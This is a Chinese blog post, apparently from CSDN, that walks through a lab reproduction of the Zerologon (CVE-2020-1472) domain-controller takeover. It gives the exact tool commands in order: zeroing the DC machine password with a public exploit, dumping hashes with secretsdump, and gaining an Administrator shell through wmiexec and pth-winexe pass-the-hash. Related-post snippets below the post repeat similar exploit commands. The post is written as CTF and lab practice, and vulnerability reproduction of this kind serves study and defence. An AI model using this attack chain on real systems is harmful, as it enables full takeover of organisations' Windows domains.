域内大杀器CVE-2020-1472复现

最新推荐文章于 2022-11-15 16:07:43 发布
最新推荐文章于 2022-11-15 16:07:43 发布
阅读量5.5k 收藏 18
点赞数 4
分类专栏: 漏洞复现 文章标签: windows 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51923959/article/details/111682291
版权

前一段时间打ctf第一次接触域渗透,其中CVE-2020-1472被称为域控的大杀器,在本地搭建了个环境复现一下

CVE-2020-1472影响的版本:

  • Windows Server 2008 R2 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
  • Windows Server 2012
  • Windows Server 2012 (Server Core installation)
  • Windows Server 2012 R2
  • Windows Server 2012 R2 (Server Core installation)
  • Windows Server 2016
  • Windows Server 2016 (Server Core installation)
  • Windows Server 2019
  • Windows Server 2019 (Server Core installation)
  • Windows Server, version 1903 (Server Core installation)
  • Windows Server, version 1909 (Server Core installation)
  • Windows Server, version 2004 (Server Core installation)

这个漏洞之所以能够被称为内网大杀器是因为现在很多的域控都是基于2008R2系统搭建的,即使有一些域控不是2008R2的版本,但只要是2008R2以后的版本都会被此漏洞影响。换一种说法,只要你拿到了有CVE-2020-1472的内网机器,那么你在内网横向移动上就是畅通无阻的

正文如下:

搭建域环境请自行参照其他博主的步骤,此处不再赘述

我的域环境如下:
在这里插入图片描述

WIN2008R2为域控 192.168.1.10
XP 192.168.1.11
W7 192.168.1.12
攻击机kali 192.168.1.110

注意一下这三台主机是能够互相ping通的,在之前我遇到过在一个域里面net view出来只有一台或两台主机,这时候的话可以有ping命令检查一下,几台主机之间能否ping通

域环境net view如下:
在这里插入图片描述

首先我们这里需要用到python的一个impacket库,下载链接如下:
https://github.com/SecureAuthCorp/impacket.git

简单介绍下impacket库:
Impacket是一个Python类库,用于对SMB1-3或IPv4 / IPv6 上的TCP、UDP、ICMP、IGMP,ARP,IPv4,IPv6,SMB,MSRPC,NTLM,Kerberos,WMI,LDAP等协议进行低级编程访问

也可以用pip install在kali上下载,此处我是在windows上下载解压后再拖进kali的,解压后进入impacket文件夹,执行如下命令:

python3 setup.py install

PS:这个地方如果显示安装失败的话请检查以下你kali的python环境

在这里插入图片描述

虽然知道2008R2存在该漏洞,但是在平时我们是不知道别人的主机是否安装了这个漏洞补丁的,所以先用poc看一下,poc链接如下:
https://github.com/SecuraBV/CVE-2020-1472
下载解压后放入kali执行如下语句:

python3 zerologon_tester.py 域控主机名 域控IP

出现如下语句便是存在漏洞

在这里插入图片描述

此处我们既然要利用该漏洞,就应该用exp将域控打空
exp如下:
https://github.com/dirkjanm/CVE-2020-1472
还是下载解压后放入kali执行如下语句:

python3 cve-2020-1472-exploit.py 域控主机名 域控IP

出现如下语句便是已经成功将域控打空
在这里插入图片描述

下一个步骤是用空密码dump域控上的hash
这个地方有些文章没有说清楚,导致这个地方我卡了很久,所以这个地方详细说一下
首先找到之前下载的impacket的文件夹,找到examples文件夹进入,在examples文件夹下打开命令行,然后使用如下语句即可:

python3 secretsdump.py 域名称/域控主机名$@域控IP -no-pass

在这里插入图片描述
找到administrator的hash值将其复制(注意只要冒号后面的)
在这里插入图片描述
利用获取到的管理员hash通过dos命令远程控制域控服务器
进入之后whoami查看权限,为Administrator权限

python3 wmiexec.py -hashes hash值 域名称/域控用户名@域控ip

在这里插入图片描述

这个地方还可以用到pth-winexe下的一个命令进入dos界面
语句如下:

pth-winexe -U hash值 //域控ip cmd

在这里插入图片描述
效果也是一样的,此处为此前经验的积累用的此命令

复现完成,因为是本地环境就没有继续进行横向移动,但是不影响CVE-2020-1472成为内网大杀器的结果。
总结一下:
查看版本 -> poc查询 -> exp打空域控 -> 获取hash -> 空密码dump域控hash -> 拿到shell

如果后面在实战过程中有用到该大杀器再来完善,菜狗未完待续。

Drunkmars
关注
  • 4
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
CVE-2020-1472渗透 NetLogon 权限提升漏洞
千寻的博客
06-13 204
模拟环境:获取了一个加入了的计算机权限,在system账号权限的情况下,将管密码置空,导出管hash,然后进行连接
CVE-2020-1472 内提权
逗比大师的博客
09-16 82
攻击者通过NetLogon(MS-NRPC),建立与控间易受攻击的安全通道时,可利用此漏洞获取管访问权限。成功利用此漏洞的攻击者可以在该网络中的设备上运行经特殊设计的应用程序。 影响版本 Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Syste...
CVE-2020-1472漏洞复现
blue_fantasy的博客
01-14 2255
Text. 简介 2020年8月11号,微软修复了Netlogon 特权提升漏洞,2020年9月11日,安全研究员Secura发布了公告,阐明了漏洞细节,之后相关的EXP也就被构造出来。该漏洞也称为“Zerologon”,CVSS评分为10.0,号称3秒撸控,危害严重。攻击者在通过NetLogon(MS-NRPC)协议与AD控建立安全通道时,可利用该漏洞将AD控的计算机账号密码置为空,从而控制控服务器。 原理 详细原理参看:ZeroLogon的利用以及分析 - 安全客,安全资讯平台 本文对
CVE-2020-1472复现与完整利用
热门推荐
Shanfenglan's blog
10-10 14万+
CATALOG漏洞原理利用1.修改文件impacket.dcerpc.v5.nrpc2.置空机器账户yukong$密码3.读取administrator密码4.下载目标的sam文件为下一步恢复机器密码做准备5.破解sam文件查看过去的机器密码6.重制密码yukong$机器密码7.查看密码是否恢复成功 漏洞原理 原理比较复杂,有兴趣的可以看看下面链接上的文章https://www.freebuf.com/articles/system/249860.html 利用 1.修改文件impacket.dcerpc.
CVE-2020-1472复现
weixin_44216796的博客
01-01 271
环境搭建 环境:windows server 2019 下一步等待安装完成。 漏洞验证 使用如下命令进行验证: git clone https://github.com/SecuraBV/CVE-2020-1472 cd CVE-2020-1472 python3 -m pip install -r requirements.txt python3 zerologon_tester.py DC_NETBIOS_NAME DC_IP_ADDR 出现下图提示证明存在该漏洞: 漏洞利用
CVE-2020-1472 poc复现
m0_46580995的博客
09-15 461
测试脚本(https://github.com/SecuraBV/CVE-2020-1472) python3 exp NetBIOS名称(名)ip 搭建winsever2016主控制器搭建(https://blog.51cto.com/lizmfinder/2127943)
NetLogon特权提升漏洞(CVE-2020-1472复现及问题解决
Love&Share
09-17 1万+
NetLogon特权提升漏洞(CVE-2020-1472复现 漏洞描述 2020年08月12日,Windows官方 发布了 NetLogon 特权提升漏洞 的风险通告,该漏洞编号为 CVE-2020-1472,漏洞等级:严重,漏洞评分:10分。CVE-2020-1472是一个windows控中严重的远程权限提升漏洞,攻击者通过NetLogon,建立与控间易受攻击的安全通道时,可利用此漏洞获取管访问权限。 漏洞成因 Netlogon协议身份认证采用了挑战-响应机制,其中加密算法是AES-CFB8,并且
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
CVE-2020-35728:CVE-2020-35728 和 Jackson-databind RCE
05-31
描述 2.9.10.8 之前的 FasterXML jackson-databind 2.x 错误处理了与 ... web/javax.servlet.jsp.jstl)。 如何RCE pom.xml <?xml version="1.0" encoding="UTF-8"?>...
CVE-2020-1472:CVE-2020-1472的测试工具
03-16
使用Impacket库测试Zerologon漏洞(CVE-2020-1472)的漏洞的Python脚本。 它尝试执行Netlogon身份验证绕过。 成功执行旁路时,脚本将立即终止,并且不执行任何Netlogon操作。 修补控制器后,检测脚本将在发送2000...
CVE-2020-36179:CVE-2020-36179~82 Jackson-databind SSRF&RCE
05-29
描述CVE-2020-36179:2.9.10.8之前的FasterXML jackson-databind 2.x处理与oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS相关的序列化小工具和键入之间的交互。 CVE-2020-36180:FasterXML jackson-...
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
CVE-2020-1472 内提权复现
weixin_39811856的博客
09-22 470
1.利用流程 漏洞利用 流程如下: 1、 置空控保存在AD中的密码 2、 获取控用户HASH 3、通过获取到的管理员HASH得到一个SHELL 2.安装最新的impacket: https://github.com/SecureAuthCorp/impacket 注意:不要下载tags里面的,tags里面还是3月份的! 3.漏洞利用: 1)置空(置空的不是管理员账号密码) 2)使用空密码dump控上的hash 如图: WIN-I0E7JQ4II7A$用户hash已被替..
CVE-2020-1472 Netlogon特权提升漏洞分析及复现
include_voidmain的博客
03-03 7123
0x01漏洞背景 NetLogon远程协议是一种在Windows 控上使用的RPC 接口,被用于各种与用户和机器认证相关的任务。最常用于让用户使用NTLM协议登录服务器,也用于NTP响应认证以及更新计算机密码。 微软MSRC于8月11日发布了Netlogon 特权提升漏洞安全通告。此漏洞CVE编号CVE-2020-1472,CVSS评分:10.0。由Secura公司的Tom Tervoort发现提交并命名为ZeroLogon。 0x02漏洞分析 Netlogon协议使用的是自定义的加密协议来让客户端(加
CVE-2020-1472: NetLogon特权提升漏洞(附exp复现
02-06 2万+
漏洞描述: 2020年08月12日, 微软官方发布了 NetLogon 特权提升漏洞 的风险通告。攻击者通过NetLogon(MS-NRPC),建立与控间易受攻击的安全通道时,可利用此漏洞获取管访问权限。成功利用此漏洞的攻击者可以在该网络中的设备上运行经特殊设计的应用程序。 漏洞级别:严重 漏洞编号:CVE-2020-1472 漏洞复现: 准备工具: Impacket工具包:htt...
CVE-2020-1472-ZeroLogon复现
qq_56426046的博客
11-15 1042
Netlogon使用的AES认证算法中的vi向量默认为0,导致攻击者可以绕过认证,同时其设置控密码的远 程接口也使用了该函数,导致可以将控中保存在AD中的管理员password设置为空。
CVE-2020-1472复现过程(不需要输入DC Name)
weixin_39811856的博客
02-10 319
环境搭建 Windows server 2012R2 IP:192.168.146.183 漏洞利用 使用mimikatz进行检测 使用mimikatz进行密码置空 在大部分网上所给出的脚本中,发现DC Name需要手动输入,根据系统命令的调用,发现通过系统命令可得到局网内主机的DC Name Windows: Linux: 检测脚本(仅检测,不具有破坏性)可调用系统命令得到局网内DC Name: 在使用检测脚本时,要求impacket库版本为0.9...
CVE-2020-1472(内提权)
p01son的博客
08-02 679
CVE-2020-1472(内提权) Created: July 7, 2021 5:25 PM 文章目录CVE-2020-1472(内提权)简介影响范围复现环境复现过程恢复原机器hash参考 简介 CVE-2020-1472是一个windows控中严重的远程权限提升漏洞,是因为微软在Netlogon协议中没有正确使用加密算法而导致的漏洞。由于微软在进行AES加密运算过程中,使用了AES-CFB8模式并且错误的将IV设置为全零,这使得攻击者在明文(client chanllenge)、IV等要素可控的
CVE-2020-1472(zero-logon)
include_heqile的博客
11-22 357
https://mp.weixin.qq.com/s/BZ_-ud67FpUgkP48GCtBUA
CVE-2020-1472
最新发布
08-30
CVE-2020-1472是一个Windows控中的严重的远程权限提升漏洞。该漏洞是由于微软在Netlogon协议中错误使用加密算法而引起的。在进行AES加密运算时,微软使用了AES-CFB8模式并错误地将初始化向量(IV)设置为全零。这使得在攻击者可以控制明文(客户端挑战)和IV等要素的情况下,存在较高的概率生成全零的密文。这个漏洞可能被攻击者利用来远程提升权限,并在Windows控服务器上执行恶意操作。 为了利用该漏洞,可以使用提供的CVE-2020-1472-exploit.py脚本来攻击目标服务器。该脚本可以通过指定的命令行参数来执行攻击,例如"python3 cve-2020-1472-exploit.py dc$ 192.168.10.10"。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [CVE-2020-1472 ZeroLogon漏洞分析利用](https://blog.csdn.net/qq_50854790/article/details/123121372)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [CVE-2020-1472 NetLogon 权限提升漏洞](https://blog.csdn.net/qq_53579360/article/details/128923909)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值